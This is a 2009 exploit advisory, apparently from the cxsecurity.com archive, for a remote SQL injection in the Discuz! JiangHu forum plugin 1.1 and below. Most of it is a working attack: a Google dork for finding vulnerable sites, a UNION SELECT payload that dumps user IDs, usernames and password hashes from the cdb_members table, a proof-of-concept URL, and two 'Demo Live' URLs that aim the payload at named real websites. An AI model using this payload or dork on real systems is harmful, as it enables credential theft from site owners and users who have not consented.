Discuz! JiangHu plugin versions 1.1 and below remote SQL injection

2009.09.11
Credit: ZhaoHuAn
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

========================================================= Discuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability ========================================================= ========================[Author]========================= [+] Founded : ZhaoHuAn [+] Contact : ZhengXing[at]shandagames[dot]com [+] Blog : http://www.patching.net/zhaohuan/ [+] Date : Feb, 9th 2009 [+] Update : Sep, 1th 2009 ========================[Soft Info]====================== Software: Discuz! Plugin JiangHu Inn Version : 1.1 Vendor : http://www.discuz.com d0rk : inurl:forummission.php [-] Exploit: [+] and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members-- [-] SqlI PoC: [+] http://target/[path]/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members-- [+] Demo Live: [-] http://www.palslp.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members-- [-] http://bbs.sunspals.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members-- /---------------------------------------------www.zhaohuan.net-------------------------------------------------\ Greetz : Snda Security Team & Normal is boring - -! \--------------------------------------------------------------------------------------------------------------/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top